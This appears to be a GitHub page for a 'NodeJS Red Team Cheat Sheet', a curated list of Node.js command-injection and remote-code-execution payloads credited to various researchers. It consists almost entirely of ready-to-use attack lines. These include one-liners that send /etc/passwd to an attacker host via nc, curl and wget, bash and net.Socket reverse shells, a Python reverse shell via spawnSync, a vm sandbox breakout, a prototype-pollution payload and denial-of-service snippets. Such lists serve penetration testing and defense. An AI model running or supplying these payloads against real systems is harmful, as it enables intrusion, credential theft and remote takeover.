Skip to content

Latest commit

 

History

History
122 lines (99 loc) · 3.65 KB

NodeJS-Red-Team-Cheat-Sheet.md

File metadata and controls

122 lines (99 loc) · 3.65 KB

NodeJS Red Team Cheat Sheet

A curated list of NodeJs Command Injection / RCE Payloads.

Know the evil functions

eval(),setTimeout(),setInterval(), Function(), unserialize()

Know your weapons

fs , child_process, net, http

spawn = returns a stream, returns huge binary data to Node

exec = returns a buffer, should be used to return status

Attack Vectors

Denial of Service

while(1)

Exit the running process

process.exit()

Kill Process

process.kill(process.pid)

Read current working directory

res.end(require('fs').readdirSync('.').toString())

Read previous directory

res.end(require('fs').readdirSync('..').toString())

Read file

res.end(require('fs').readFileSync(fname))

Spawn Magic ( by @aaditya_purani)

require('child_process').spawn('ls',['-a']).stdout.on('data', function (data) {console.log('own'+ data); });

Child exec ( by @artsploit )

require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')
require('child_process').exec('bash+-c+"bash+-i+>%26+/dev/tcp/nc_host/nc_port+0>%261"')
require('child_process').exec('curl+-F+"x=`cat+/etc/passwd`"+attackersip.com')

Wget post data (by @brutelogic)

require('child_process').exec('wget+--post-data+"x=$(cat+/etc/passwd)"+HOST')

Using net (by ibreak.software)

var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

Using arguments[1] as response object (by @OrhanAlbay)

arguments[1].end(require('child_process').execSync('whoami'))
arguments[1].end(require('child_process').execSync('cat /etc/passwd'))

Bypass stream limits by compressing to gzip (by @aaditya_purani)

const pwn=require('zlib').createGzip();const inx=require('fs').createReadStream('app.json');const oux = require('fs').createWriteStream('unrestrictive.gz');inx.pipe(pwn).pipe(oux)

Sandbox Bypass spawnSync (by netspi)

var resp = spawnSync('python',
['-c',
'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("127.0.0.1",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
]
);
print(resp.stdout);
print(resp.stderr);

vm module breakout (by pwnisher)

"use strict";
const vm = require("vm");
const xyz = vm.runInNewContext(`const process = this.constructor.constructor('return this.process')();
process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);
console.log(xyz);

Alternative RCE payload (by mahmoud)

x = ''
myToString = x.toString.bind("console.log(process.env)")
myToStringArr = Array(myToString)
myToStringDescriptor = Object.getOwnPropertyDescriptor(myToStringArr, 0)
Object.defineProperty(Object.prototype, "toString", myToStringDescriptor)
Object.constructor("test", this)()

Need More ?

Repository would be maintained time to time. Feel free to contribute.

Contact

@aaditya_purani